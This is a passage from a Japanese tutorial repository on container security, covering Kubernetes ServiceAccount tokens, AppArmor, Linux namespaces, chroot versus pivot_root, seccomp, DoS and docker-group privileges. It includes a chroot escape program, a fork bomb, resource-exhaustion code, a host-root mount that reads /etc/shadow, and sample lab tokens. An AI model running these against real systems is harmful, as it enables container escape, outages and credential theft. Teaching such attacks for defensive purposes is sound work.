   "spec":{
      "resourceAttributes":{
         "namespace":"lab",
         "verb":"get",
         "resource":"pods"
      }
   },
   "status":{
   }
}
EOF

{
  "kind": "SelfSubjectAccessReview",
  "apiVersion": "authorization.k8s.io/v1",
  "metadata": {
    "creationTimestamp": null,
    "managedFields": [
      {
        "manager": "curl",
        "operation": "Update",
        "apiVersion": "authorization.k8s.io/v1",
        "time": "2020-11-23T02:39:02Z",
        "fieldsType": "FieldsV1",
        "fieldsV1": {"f:spec":{"f:resourceAttributes":{".":{},"f:namespace":{},"f:resource":{},"f:verb":{}}}}
      }
    ]
  },
  "spec": {
    "resourceAttributes": {
      "namespace": "lab",
      "verb": "get",
      "resource": "pods"
    }
  },
  "status": {
    "allowed": false
  }
}
```

もし次のように Job を作成するできるような権限を持った ServiceAccount のトークンがマウントされている場合は、Job を通して Pod を作成することができます。  

```yaml
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: runner
  namespace: lab

---
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: job-runner
  namespace: lab
rules:
  - apiGroups: ["batch", "extensions"]
    resources: ["jobs", "job/status"]
    verbs: ["*"]
  - apiGroups: [""]
    resources: ["pods", "pods/binding", "pods/log", "pods/status"]
    verbs: ["get", "list"]

---
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: job-runner
  namespace: lab
subjects:
- kind: ServiceAccount
  name: runner
  namespace: lab
roleRef:
  kind: Role
  name: job-runner
  apiGroup: rbac.authorization.k8s.io
```

```shell
bash-5.0# curl -sSk -H "Authorization: Bearer $KUBE_TOKEN" -H "Content-Type: application/json" -H 'Accept: application/json, */*' -d @- https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_PORT_443_TCP_PORT/apis/batch/v1/namespaces/lab/jobs <<'EOF'
{
   "apiVersion":"batch/v1",
   "kind":"Job",
   "metadata":{
      "name":"sleep-job",
      "namespace":"lab"
   },
   "spec":{
      "backoffLimit":4,
      "template":{
         "spec":{
            "containers":[
               {
                  "command":[
                    "sleep",
                    "100"
                  ],
                  "image":"alpine:latest",
                  "name":"sleep-job"
               }
            ],
            "restartPolicy":"Never"
         }
      }
   }
}
EOF
```

例えばもし、 hostPath のマウントを制限していない場合、これを利用して Pod が配置された node にエスケープすることができます。  

## `automountServiceAccountToken` を利用してトークンをマウントしない

Pod に ServiceAccount のトークンをマウントする必要がない場合は `automountServiceAccountToken: false` を指定します。

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: pod
spec:
  serviceAccount: runner
  automountServiceAccountToken: false
  ...
```

また、 ServiceAccount に対して `automountServiceAccountToken` を指定することもできます。

```yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  name: runner
  namespace: lab
automountServiceAccountToken: false
```

ServiceAccount に対して指定した場合、明示的に `automountServiceAccountToken: true` を指定しなければマウントされません。  

## TokenRequestProjection を利用する

TokenRequestProjection を利用することで ServiceAccount トークンを動的に発行して Pod にマウントすることができます。[^1]  
これにより ServiceAccount のトークンの有効期限を設定しつつ、自動で Pod 内のトークンをリフレッシュすることができます。  
また、Pod を削除するとそのトークンも利用不可となるため、トークンが漏洩した場合に影響を小さくすることができます。

例えば次のようなマニフェストを実行すると、10分でリフレッシュされる ServiceAccount トークンをマウントする Pod を作成することができます。

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: sleep
spec:
  serviceAccount: runner
  containers:
  - name: alpine
    image: alpine:latest
    args:
    - tail
    - -f
    - /dev/null
    volumeMounts:
        - mountPath: /var/run/secrets/tokens
          name: token
  volumes:
  - name: token
    projected:
      sources:
      - serviceAccountToken:
          path: token
          expirationSeconds: 600
          audience: api
```

Pod を実行し、10分経過すると token がリフレッシュされていることが確認できます。

```shell
/run/secrets/tokens # date
Mon Nov 23 08:17:14 UTC 2020
/run/secrets/tokens # cat token
eyJhbGciOiJSUzI1NiIsImtpZCI6IkRqWFZUR3dMZ2tsbXZyUHVGZ01nRHc5d2Q3U3laRjZVRXFHTzQ5eHZaQjAifQ.eyJhdWQiOlsiYXBpIl0sImV4cCI6MTYwNjExOTcxOCwiaWF0IjoxNjA2MTE5MTE4LCJpc3MiOiJrdWJlcm5ldGVzLmRlZmF1bHQuc3ZjIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJsYWIiLCJwb2QiOnsibmFtZSI6InNsZWVwIiwidWlkIjoiZDQ4N2M5ODQtNzMxNC00MWZmLThjZTUtNWUxNGIyZDc0OGFmIn0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJydW5uZXIiLCJ1aWQiOiIyYTNjYjZiZi1lOGE5LTRhNDAtYWFlMC1lODMyMjMwNjI5MzIifX0sIm5iZiI6MTYwNjExOTExOCwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmxhYjpydW5uZXIifQ.Sr6ZkbaoFlX4QcUO53gloBjkT_hqKYg1wh13qS6lAX1INUi7tVEYWCjKw3RvkocNIeFIa7WWzlgD66vdXT2OV63yd2Zxovndyx68_PSqbYlhluASTiOasT24JGqqN7iq2uwp8hrw5YTjyEenLQhAJ1qC1Xzgh5NQYxcLYErk2NQVFKQzbhrHVZvtl0NlW3lyNmp6beCy1_jZqccyOTWK8p_D0HXRGkSHo1ExYRYqtbIg-f6j61-NwWU0duUbI_i-vRFO7KefW4onv2RBRiOun91by_xCziAYXWch6SFYWSIbxaFvk-jb6OixtMgUI8q514AWb2SGoWQ0xBvAQhikhg

/run/secrets/tokens # date
Mon Nov 23 08:29:03 UTC 2020
/run/secrets/tokens # cat token
eyJhbGciOiJSUzI1NiIsImtpZCI6IkRqWFZUR3dMZ2tsbXZyUHVGZ01nRHc5d2Q3U3laRjZVRXFHTzQ5eHZaQjAifQ.eyJhdWQiOlsiYXBpIl0sImV4cCI6MTYwNjEyMDIwNCwiaWF0IjoxNjA2MTE5NjA0LCJpc3MiOiJrdWJlcm5ldGVzLmRlZmF1bHQuc3ZjIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJsYWIiLCJwb2QiOnsibmFtZSI6InNsZWVwIiwidWlkIjoiZDQ4N2M5ODQtNzMxNC00MWZmLThjZTUtNWUxNGIyZDc0OGFmIn0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJydW5uZXIiLCJ1aWQiOiIyYTNjYjZiZi1lOGE5LTRhNDAtYWFlMC1lODMyMjMwNjI5MzIifX0sIm5iZiI6MTYwNjExOTYwNCwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmxhYjpydW5uZXIifQ.SgObuy7ql-kXI-P6uNY6hmUdONSZJfPo7dvxukU7kKFCCIvQcNnWYxzOoo2B_XK4_u7atAGtqWSe9MBG6rJpT73lOjSmGMOeqGVKAe6UTpbnbmS9DO6sVnwCNOCRgs_muwTyF6km66ZxvAm866V5kUIoX407Aa5I-KWZk-8OKT9Db6QKgKBqA9lPKX_Ii-AYBVi_kKB1wR70zxNW_VOapMh9oGXU-ymzGDfJb0Cdo8wJJabpgbIWVlEO7E9417gf6w90U_H5b4mOdGsjWs0JtgVXw3sGBflHUrU0AwYUXI6a8B_HFbS4Q0ChYMZCm5amFQvC6lZL5OsILnaG9JwILg
```

古いトークンは利用できなくなっていることも確認しましょう。

```shell
bash-5.0# KUBE_TOKEN=eyJhbGciOiJSUzI1NiIsImtpZCI6IkRqWFZUR3dMZ2tsbXZyUHVGZ01nRHc5d2Q3U3laRjZVRXFHTzQ5eHZaQjAifQ.eyJhdWQiOlsiYXBpIl0sImV4cCI6MTYwNjExOTcxOCwiaWF0IjoxNjA2MTE5MTE4LCJpc3MiOiJrdWJlcm5ldGVzLmRlZmF1bHQuc3ZjIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJsYWIiLCJwb2QiOnsibmFtZSI6InNsZWVwIiwidWlkIjoiZDQ4N2M5ODQtNzMxNC00MWZmLThjZTUtNWUxNGIyZDc0OGFmIn0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJydW5uZXIiLCJ1aWQiOiIyYTNjYjZiZi1lOGE5LTRhNDAtYWFlMC1lODMyMjMwNjI5MzIifX0sIm5iZiI6MTYwNjExOTExOCwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmxhYjpydW5uZXIifQ.Sr6ZkbaoFlX4QcUO53gloBjkT_hqKYg1wh13qS6lAX1INUi7tVEYWCjKw3RvkocNIeFIa7WWzlgD66vdXT2OV63yd2Zxovndyx68_PSqbYlhluASTiOasT24JGqqN7iq2uwp8hrw5YTjyEenLQhAJ1qC1Xzgh5NQYxcLYErk2NQVFKQzbhrHVZvtl0NlW3lyNmp6beCy1_jZqccyOTWK8p_D0HXRGkSHo1ExYRYqtbIg-f6j61-NwWU0duUbI_i-vRFO7KefW4onv2RBRiOun91by_xCziAYXWch6SFYWSIbxaFvk-jb6OixtMgUI8q514AWb2SGoWQ0xBvAQhikhg

bash-5.0# curl -sSk -H "Authorization: Bearer $KUBE_TOKEN" https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_PORT_443_TCP_PORT/api/v1/namespaces/lab/pods/$HOSTNAME
{
  "kind": "Status",
  "apiVersion": "v1",
  "metadata": {

  },
  "status": "Failure",
  "message": "Unauthorized",
  "reason": "Unauthorized",
  "code": 401
}
```

Pod を削除すると有効だったトークンも利用できなくなっています。

```shell
$ kubectl delete -f test.pod

bash-5.0# curl -sSk -H "Authorization: Bearer $KUBE_TOKEN" https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_PORT_443_TCP_PORT/api/v1/namespaces/lab/pods/$HOSTNAME
{
  "kind": "Status",
  "apiVersion": "v1",
  "metadata": {

  },
  "status": "Failure",
  "message": "Unauthorized",
  "reason": "Unauthorized",
  "code": 401
}
```


---

[^1]: https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/#service-account-token-volume-projection


================================================
FILE: source/lsm/apparmor.md
================================================
# AppArmor

AppArmor は Linux Security Module (LSM) の一つで、Mandatory access control (MAC) を実現しています。  
アプリケーションごとにプロファイルを適用することができ、特定のファイルへのアクセスやシステムコールの呼び出しの制限を行うことができます。

例えば次のようなプロファイルを作成し、有効化することで `/home/ubuntu/mybash` は `/etc/hosts` の読み込みだけができ、他のファイルへの読み書きができなくなります。

```sh
$ cat /etc/apparmor.d/test
#include <tunables/global>

profile test /home/ubuntu/mybash {
    #include <abstractions/base>

    /etc/hosts r,
    /usr/bin/cat ix,
}

$ sudo apparmor_parser -r -W /etc/apparmor.d/test

$ ./mybash
mybash-5.0$ cat /etc/passwd
cat: /etc/passwd: Permission denied
mybash-5.0$ cat /etc/hosts
# Your system has configured 'manage_etc_hosts' as True.
...
127.0.0.1 localhost
...

mybash-5.0$ echo test >> /etc/hosts
mybash: /etc/hosts: Permission denied
```

Docker コンテナにも `default-docker` というプロファイル名で適用されており、多層防御の一つとして機能します。[^1]

```sh
$ sudo aa-status | grep docker
   docker-default
```

例えば、 `CAP_SYS_ADMIN` を付与した場合でも `mount` コマンドは AppArmor によって実行が防止されますが、AppArmor を外すことで実行することができ、AppArmor が最後の砦として機能していることが確認できます。

```sh
$ docker container run --rm -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined ubuntu:latest bash
root@85c7ea124688:/# mkdir a; mkdir b; mount --bind a b
mount: /b: bind /a failed.

$ docker container run --rm -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu:latest bash
root@110e911e07bc:/# mkdir a; mkdir b; mount --bind a b
root@110e911e07bc:/#
```

コンテナ上で動くアプリケーションに対応したカスタムプロファイルを作成することで、コンテナをより強固にすることができます。

---

[^1]: https://github.com/moby/moby/blob/master/contrib/apparmor/template.go


================================================
FILE: source/namespace/README.md
================================================
# Namespace

Linux Namespace はホストとの Isolation の要の一つです。  
ここでは Linux Namespace を単に Namespace あるいは名前空間と呼ぶこととします。

Namespace は Linux カーネルの機能で、ホストと Namespace 内のプロセスとでリソースを分離することができます。  
コンテナごとに Namespace を持つことで、ホストや他のコンテナとの分離を実現しています。

Namespace には Linux 5.9 の段階では、次の8つがあります。

| Namespace | 概要 |
|:---------:|:----:|
| Cgroup | Namespace ごとに cgroup を作成する（Linux 4.6 から） |
| IPC | IPC や POSIX message queues などを分離 |
| Network | ネットワークデバイスやアドレスなどを分離 |
| Mount | ファイルシステムを分離 |
| PID | プロセスID を分離する（Linux 3.8 から） |
| Time | システムクロックの一部を分離する（Linux 5.6 から） |
| User | UID / GID を分離する（Linux 3.8 から） |
| UTS | hostname を分離する |

例えばコンテナを作成したときにホスト側のプロセスは確認できませんし、ホスト名もホスト側とは異なります。  
これらは Namespace を使って実現されています。

```
root@3a7669ccdce1:/# hostname
3a7669ccdce1
root@3a7669ccdce1:/# ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.2  0.0   4108  3440 pts/0    Ss   04:04   0:00 bash
root          10  0.0  0.0   5888  2860 pts/0    R+   04:04   0:00 ps aux
```

## Namespace の確認

コンテナ以外でも Namespace は使われています。現在利用されている Namespace とそのプロセスを一覧するには `lsns` コマンドを利用します。

```
ubuntu@docker:~$ sudo lsns
        NS TYPE   NPROCS   PID USER             COMMAND
4026531835 cgroup    143     1 root             /sbin/init
4026531836 pid       143     1 root             /sbin/init
4026531837 user      143     1 root             /sbin/init
4026531838 uts       139     1 root             /sbin/init
4026531839 ipc       143     1 root             /sbin/init
4026531840 mnt       135     1 root             /sbin/init
4026531860 mnt         1    33 root             kdevtmpfs
4026531992 net       143     1 root             /sbin/init
4026532210 mnt         2   412 root             /lib/systemd/systemd-udevd
4026532211 uts         2   412 root             /lib/systemd/systemd-udevd
4026532212 mnt         1   548 systemd-timesync /lib/systemd/systemd-timesyncd
4026532213 uts         1   548 systemd-timesync /lib/systemd/systemd-timesyncd
4026532214 mnt         1   627 systemd-network  /lib/systemd/systemd-networkd
4026532215 mnt         1   630 systemd-resolve  /lib/systemd/systemd-resolved
4026532272 mnt         1   693 root             /usr/sbin/irqbalance --foreground
4026532273 mnt         1   704 root             /lib/systemd/systemd-logind
4026532275 uts         1   704 root             /lib/systemd/systemd-logind
```

`NS` 列に記載されているのが Namespace の ID で、重複していないことがわかります。  
この Namespace の ID は `/proc/$PID/ns` で確認できます。

```
ubuntu@docker:~$ sudo ls -al /proc/1/ns
total 0
dr-x--x--x 2 root root 0 Nov 13 12:47 .
dr-xr-xr-x 9 root root 0 Nov 13 12:47 ..
lrwxrwxrwx 1 root root 0 Nov 13 12:48 cgroup -> 'cgroup:[4026531835]'
lrwxrwxrwx 1 root root 0 Nov 13 12:48 ipc -> 'ipc:[4026531839]'
lrwxrwxrwx 1 root root 0 Nov 13 12:47 mnt -> 'mnt:[4026531840]'
lrwxrwxrwx 1 root root 0 Nov 13 12:48 net -> 'net:[4026531992]'
lrwxrwxrwx 1 root root 0 Nov 13 12:48 pid -> 'pid:[4026531836]'
lrwxrwxrwx 1 root root 0 Nov 13 13:01 pid_for_children -> 'pid:[4026531836]'
lrwxrwxrwx 1 root root 0 Nov 13 12:48 user -> 'user:[4026531837]'
lrwxrwxrwx 1 root root 0 Nov 13 12:48 uts -> 'uts:[4026531838]'
```

Namespace は `unshare(2)` を利用して作成できます。`unshare(1)` を使うことで簡単に利用できるので試してみましょう。  
UTS namespace を作成し、その Namespace 内で bash を実行します。

```
ubuntu@docker:~$ sudo unshare --uts bash
root@docker:/home/ubuntu# hostname test
root@docker:/home/ubuntu# hostname
test
root@docker:/home/ubuntu#
```

`lsns` コマンドを実行すると Namespace `4026532216` で UTS 名前空間が作成されていることが確認できます。

```
ubuntu@docker:~$ sudo lsns | grep bash
4026532216 uts         1  1441 root             bash
```


================================================
FILE: source/namespace/chroot-and-pivot_root.md
================================================
# chroot と pivot_root

Mount Namespace では、名前空間ごとにマウントポイントを利用できることが確認できました。  
しかしコンテナではルートディレクトリ `/` 配下を全て別のファイルシステムにしなければ、ホスト側のファイルを操作できてしまいます。  
これを実現するために `chroot` と `pivot_root` が利用されます。

どちらもルートディレクトリを別のディストリに置き換えることができるシステムコールですが、挙動が全く異なります。

## chroot

`chroot` は現在のプロセスとその子プロセスのルートディレクトリを変更するシステムコールです。  
例えば次のように Alpine Linux の rootfs を用意し、そのディレクトリに chroot することで、ルートディレクトリが置き換えられたように見えます。

```sh
ubuntu@docker:~/$ mkdir alpine
ubuntu@docker:~/$ cd alpine
ubuntu@docker:~/alpine$ wget http://dl-cdn.alpinelinux.org/alpine/v3.12/releases/x86_64/alpine-minirootfs-3.12.1-x86_64.tar.gz
ubuntu@docker:~/alpine$ tar xzf alpine-minirootfs-3.12.1-x86_64.tar.gz
ubuntu@docker:~/alpine$ rm alpine-minirootfs-3.12.1-x86_64.tar.gz
ubuntu@docker:~/alpine$ cd ..

ubuntu@docker:~$ sudo chroot alpine sh
/ # ls
bin    etc    lib    mnt    proc   run    srv    tmp    var
dev    home   media  opt    root   sbin   sys    usr
/ # cat /etc/alpine-release
3.12.1
```

### chroot の問題点

chroot はプロセスが `CAP_SYS_CHROOT` Capability を持っている場合に、脱獄(chroot 環境から元の環境に移動できる)が可能です。  
これは chroot がカレントディレクトリを変更しないことに起因している仕様です。

プロセスのタスク構造体には、ルートディレクトリ情報を持つ `fs->root` とカレントディレクトリ情報を持つ `fs->pwd` があります。  
`chroot /path/to/debian` すると `fs->root` は `/path/to/debian` になります。  
さらにその chroot 環境下で `chroot test` すると `fs->root` は `/path/to/debian/test` になるのですが、 `fs->pwd` は `/path/to/debian` のままとなり、 root が pwd の子になっている構造になってしまいます。  
`cd ..` すると `fs->root` かどうかチェックが走りますが、このケースだと `fs->root` にマッチすることはないため、最終的に本来の root にたどり着き脱獄することができるという仕組みです。

これをコードにすると次のようになります。

```sh
$ cat jailbreak.c
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>

void main()
{
  mkdir("test", 0);
  chroot("test");
  chroot("../../../../../../../../../../");
  execv("/bin/bash");
}

$ gcc jailbreak.c
$ mv a.out debian/
$ sudo chroot debian bash
# ./a.out
/home/ubuntu/debian# cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=20.04
DISTRIB_CODENAME=focal
DISTRIB_DESCRIPTION="Ubuntu 20.04.1 LTS"
```

このように chroot できる権限を持っていると脱獄ができてしまいます。  
そこで脱獄を防ぐために pivot_root というシステムコールがあります。

## pivot_root

chroot はルートディレクトリを変更するものでしたが、pivot_root はプロセスのルートファイルシステムを入れ替えるものです。  
つまり、現在のプロセスのルートファイルシステムを別の場所にマウントし、新しいルートファイルシステムを `/` にマウントすることができます。  
全く別のものにすり替えてしまうものなので、脱獄のしようがありません。また、古いルートファイルシステムを unmount することも可能です。  

ただし、pivot_root をするには次の条件を満たす必要があります。[^1]

* 新しいファイルシステム(new_root)と元のファイルシステム(put_old)は現在のルートファイルシステムと同じマウントポイントにあってはいけない
* put_old は new_root の配下になければならない
* 他のファイルシステムを put_old にマウントできない

上記を満たすために bind mount を利用します。bind mount は指定したディレクトリを別の場所にそのままマウントします。インターフェイスとしては `ln` コマンドに似ていますが、一つのマウントポイントとして機能するため、pivot_root の条件を満たすことができます。

もうひとつ注意点として、pivot_root はマウントポイントを操作してルートディレクトリが変更されてしまうため、Mount Namespace を利用して実行することになります。  
では rootfs を差し替えたコンテナもどきを作ってみます。

```sh
ubuntu@docker:~$ sudo unshare --uts --pid --fork --mount sh -c \
  "mount --bind $NEW_ROOT $NEW_ROOT && \ # bind mount
  mount -t proc proc $NEW_ROOT/proc && \ # procfs をマウント
  pivot_root $NEW_ROOT $NEW_ROOT/.put_old && \ # pivot_root で差し替え
  umount -l /.put_old && \ # 元のルートファイルシステムを umount
  cd / && \
  exec /bin/sh"

/ # ps aux
PID   USER     TIME  COMMAND
    1 root      0:00 /bin/sh
    6 root      0:00 ps aux
/ # ls /etc
alpine-release  hosts           modules-load.d  periodic        shells
apk             init.d          motd            profile         ssl
conf.d          inittab         mtab            profile.d       sysctl.conf
crontabs        issue           network         protocols       sysctl.d
fstab           logrotate.d     opt             securetty       udhcpd.conf
group           modprobe.d      os-release      services
hostname        modules         passwd          shadow
```

---

[^1]: その他の条件など、詳しくは man https://man7.org/linux/man-pages/man2/pivot_root.2.html を参照ください


================================================
FILE: source/namespace/mount.md
================================================
# Mount Namespace

Mount Namespace はマウントポイントを分離することができます。PID namespace では `procfs` を unshare のプロセスにだけ見えるようにマウントしました。  
このように、プロセスごとに独自のマウントポイントを持つことができます。これを利用することで、例えばプロセスごとに異なる `tmpfs` をマウントすることで、他のプロセスから一切その内容を閲覧できないようにすることができます。  

`unshare(1)` では `--mount` フラグを用いることで Mount Namespace を作成できます。

```sh
ubuntu@docker:~$ sudo unshare --mount bash
root@docker:/home/ubuntu# mkdir /mnt/^C
root@docker:/home/ubuntu# mount -t tmpfs tmpfs /mnt
root@docker:/home/ubuntu# findmnt /mnt
TARGET SOURCE FSTYPE OPTIONS
/mnt   tmpfs  tmpfs  rw,relatime
root@docker:/home/ubuntu# touch /mnt/test
root@docker:/home/ubuntu# ls /mnt
test

# ホスト側で実行
ubuntu@docker:~$ findmnt /mnt
ubuntu@docker:~$ ls /mnt/
ubuntu@docker:~$
```

このように、名前空間にいるプロセスからしかマウントポイントが確認できなくなっています。  
これは Systemd の PrivateTmp でも利用されています。


================================================
FILE: source/namespace/pid.md
================================================
# PID Namespace

PID Namespace はプロセスの PID を分離します。コンテナの中で `ps` コマンドを実行すると PID 1 のプロセスが存在していることが確認できます。  
通常 Linux では重複した PID を持つプロセスを生成することはできませんが、Namespace が異なるため同じ PID を持っているかのように見えるプロセスを作ることができます。  

`unshare(1)` では `--pid` フラグを用いることで PID Namespace を作成できます。  

```sh
$ sudo unshare --pid --fork bash
root@docker:/home/ubuntu# ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.2 167632 11704 ?        Ss   12:47   0:02 /sbin/init
root           2  0.0  0.0      0     0 ?        S    12:47   0:00 [kthreadd]
root           3  0.0  0.0      0     0 ?        I<   12:47   0:00 [rcu_gp]
root           4  0.0  0.0      0     0 ?        I<   12:47   0:00 [rcu_par_gp]
```

`ps` コマンドを実行するとホスト側のプロセスも見えていますが、これは `ps` コマンドが `/proc` を見るからです。  
例えば `kill` コマンドを送信すると「No such process」というエラーが出るため、PID Namespace の分離自体はできていることが確認できます。

```sh
# ホスト側で実行
ubuntu@docker:~$ sleep 100

# Namespace 内で実行
root@docker:/home/ubuntu# ps aux | grep sleep
ubuntu      1545  0.0  0.0   7228   592 pts/1    S+   13:34   0:00 sleep 100
root        1547  0.0  0.0   8160   732 pts/0    S+   13:34   0:00 grep --color=auto sleep
root@docker:/home/ubuntu# kill -9 1545
bash: kill: (1545) - No such process
```

では `ps` コマンドでホスト側のプロセスを見えなくするにはどうすればいいでしょうか。  
PID Namespace で `procfs` を再マウントすればよいのですが、それだとホスト側に影響を与えてしまいます。  
そこで Mount Namespace も分離することでホスト側に影響を与えずに新しくマウントすることができます。  

Mount Namespace については後述するとして、 `unshare(1)` には `--mount-proc` オプションがあるため、これを利用します。  
これにより Mount Namespace を使って `procfs` をマウントしてくれます。

```sh
ubuntu@docker:~$ sudo unshare --pid --fork --mount-proc bash
root@docker:/home/ubuntu# ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.0   8960  3876 pts/0    S    13:42   0:00 bash
root           8  0.0  0.0  10608  3256 pts/0    R+   13:42   0:00 ps aux
```

冒頭で「同じ PID を持っているかのように見える」と書きましたが、これは Namespace 内から見た話であり、ホスト側から見ると規約通り PID は重複していません。  

```sh
root@docker:/home/ubuntu# sleep 100 &
[1] 10
root@docker:/home/ubuntu# ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.0   8960  3940 pts/0    S    13:42   0:00 bash
root          10  0.0  0.0   7228   592 pts/0    S    13:44   0:00 sleep 100
root          11  0.0  0.0  10608  3364 pts/0    R+   13:44   0:00 ps aux

# ホスト側で確認
ubuntu@docker:~$ ps aux | grep sleep
root        1656  0.0  0.0   7228   592 pts/0    S    13:44   0:00 sleep 100
ubuntu      1659  0.0  0.0   8160   736 pts/1    S+   13:44   0:00 grep --color=auto sleep
```


================================================
FILE: source/namespace/user.md
================================================
# User Namespace

User Namespace は UID / GID を分離し、 Namespace 内で独立した UID / GID を持てるようになります。  
また、Namespace 内の UID / GID がそれぞれホスト側の UID / GID と mapping されるようになります。

例えば Namespace 内では UID 0 (root) であっても、ホスト側から見ると UID 1000 のユーザーであるようにできます。  
これにより仮にコンテナからホスト側にエスケープできても、権限は UID 1000 の一般ユーザーであるため、影響を小さくすることができます。

`unshare(1)` では `--user` フラグを用いることで User Namespace を作成できます。  

```sh
ubuntu@docker:~$ unshare --user bash
nobody@docker:~$ id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
nobody@docker:~$ echo $$
2275
```

現在、名前空間内では `nobody` ユーザーになっています。  
試しにホスト側の UID 1000 のユーザーと Namespace 内の UID 0 (root) のユーザーを紐付けてみます。
紐付けは対象のプロセスが持つ `uid_map` に値を書き込むことで機能します。

```sh
# ホスト側で操作
root@docker:/home/ubuntu# echo '0 1000 1' > /proc/2275/uid_map
```

名前空間内で確認すると UID 0 (root) になっていることが確認できます。

```sh
nobody@docker:~$ id
uid=0(root) gid=65534(nogroup) groups=65534(nogroup)
```

ファイルを作成すると名前空間内では root 所有に見えますが、実際には UID 1000 である `ubuntu` ユーザーの所有になっていることが確認できます。

```sh
nobody@docker:~$ touch test.txt
nobody@docker:~$ ls -al test.txt
-rw-rw-r-- 1 root nogroup 0 Nov 13 14:10 test.txt

# ホスト側で操作
ubuntu@docker:~$ ls -al test.txt
-rw-rw-r-- 1 ubuntu ubuntu 0 Nov 13 14:10 test.txt
```


================================================
FILE: source/namespace/uts.md
================================================
# UTS Namespace

UTS Namespace はホスト名の分離に利用されます。  
`uname(2)` や `gethostname(2)` を使用したときに Namespace 内で設定された値を取得することができます。  

`unshare(1)` の引数に `--uts` フラグを用いることで UTS Namespace を作成できます。  
`hostname(1)` で別のホスト名に変更してもホスト側には影響がないことが確認できます。

```sh
ubuntu@docker:~$ sudo unshare --uts bash
root@docker:/home/ubuntu# hostname test
root@docker:/home/ubuntu# hostname
test

# ホスト側
ubuntu@docker:~$ hostname
docker
```


================================================
FILE: source/seccomp/README.md
================================================
# seccomp

seccomp はシステムコールとその引数を制限する仕組みです。  
例えば Docker では次のような seccomp プロファイルを与えることで `mkdir` を禁止するコンテナを作成できます。

```sh
$ cat seccomp.json
{
  "defaultAction": "SCMP_ACT_ALLOW",
  "syscalls": [
    {
      "name": "mkdir",
      "action": "SCMP_ACT_ERRNO"
    }
  ]
}

$ docker run --rm -it --security-opt seccomp=seccomp.json ubuntu:20.04 bash
root@ab9ad7d57f7f:/# mkdir /tmp/test
mkdir: cannot create directory '/tmp/test': Operation not permitted
```

Capability と同様に seccomp も Docker にはデフォルトプロファイルが存在します。[^1]  
Capability と併用することで、もし Capability を破られて特権が必要なシステムコールが呼び出されても seccomp で防ぐことができます。

---

[^1] https://docs.docker.com/engine/security/seccomp/ "Significant syscalls blocked by the default profile / docker docs"


================================================
FILE: source/security/DoS.md
================================================
# DoS

コンテナはホストとリソースを共有しているため、リソースの制限を適切に施していない場合、ホストに対する DoS となる可能性があります。

## Fork Bomb

cgroup などでプロセス数を制限していない場合、コンテナで大量にプロセスを生成することでシステムをダウンさせることができます。

```sh
:(){ :|:& };:
```

## 大量のファイルディスクリプタを生成する

開けるファイルディスクリプタ数には上限があるため、コンテナ内で大量にファイルディスクリプタを開くことでホスト側に影響を与えることができます。

```c
#include <stdio.h>
#include<string.h>
#include<unistd.h>
#include<sys/types.h>
#include<sys/stat.h>
#include<fcntl.h>

int main()
{
  char buf[100];
  for(int i=0; i=400275; i++) {
    sprintf(buf, "/tmp/%d", i);
    int fd = open(buf, O_CREAT);
    if ( fd == 1 ) {
      printf("max fd %d\n", i);
      break;
    }
    printf("open %d\n", i);
  }
  for(;;);
}
```

## ディスク容量の圧迫

コンテナにディスク容量制限がない場合は大きなファイルを作成することで、ホストのディスク容量を圧迫させることができます。

```sh
$ dd if=/dev/zero of=bigfile bs=20GB count=10
```


================================================
FILE: source/security/README.md
================================================
# コンテナのセキュリティと攻撃例

本章では[コンテナの基礎技術](../container-basics.md)で紹介した各保護レイヤに不備があった場合に生じる脆弱性や Docker のセキュリティについて紹介します。

コンテナへの攻撃経路として「ランタイムの脆弱性を利用するもの」「カーネルの脆弱性を利用するもの」「コンテナの設定不備を利用するもの」などが考えられます。  
また、コンテナ自体は開発環境や CI 環境でも利用されるケースが増え、不正な Docker イメージによって、それらの環境が侵害されるケースも考えられます。

![Docker Atatck Vector](./img/docker-attack-vector.png)

コンテナに対して Capability を付与したり、特権(Privileged)コンテナを実行したりした経験がある方もいるかもしれません。そのようなコンテナが侵害された場合、ホスト側にエスケープ(Breakout)できてしまう可能性があります。ここでは、そのようなコンテナに対する攻撃例について取り上げ、セキュアなコンテナ運用のヒントを紹介します。


================================================
FILE: source/security/adding-a-user-to-group.md
================================================
# コンテナ実行権限を持つグループへのユーザー追加

`docker` グループや `lxd` グループへのユーザー追加を行うことは、そのユーザーに root 権限を追加することと同義です。  
例えば docker の場合は次のようにホストのルートディレクトリをマウントすることで、ホスト側で任意の操作を行うことが可能になります。

```sh
ubuntu@sandbox:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied
ubuntu@sandbox:~$ docker run --rm -it -v /:/hostfs ubuntu:latest bash
root@f6a72ca2aaf6:/# cat /hostfs/etc/shadow
